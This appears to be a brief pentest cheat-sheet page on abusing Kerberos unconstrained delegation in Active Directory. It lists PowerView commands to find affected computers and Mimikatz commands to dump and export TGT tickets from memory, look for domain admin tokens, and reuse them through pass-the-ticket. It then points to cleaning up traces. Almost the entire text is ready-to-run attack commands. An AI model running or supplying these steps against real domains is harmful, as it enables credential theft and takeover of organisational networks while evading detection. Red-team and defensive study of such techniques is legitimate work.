π’Unconstrained Delegation
Discover domain computers that have unconstrained delegation
. .\PowerView_dev.ps1
Get-Netcomputer -UnConstrained
Get-Netcomputer -UnConstrained | select samaccountnameCheck if any DA tokens are available on the unconstrained machine
Invoke-Mimikatz -Command '"sekurlsa::tickets"'Export the TGT ticket
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'Reuse the TGT ticket
Invoke-Mimikatz -Command '"kerberos::ptt <kirbi file>"'klistClean up Traces
Last updated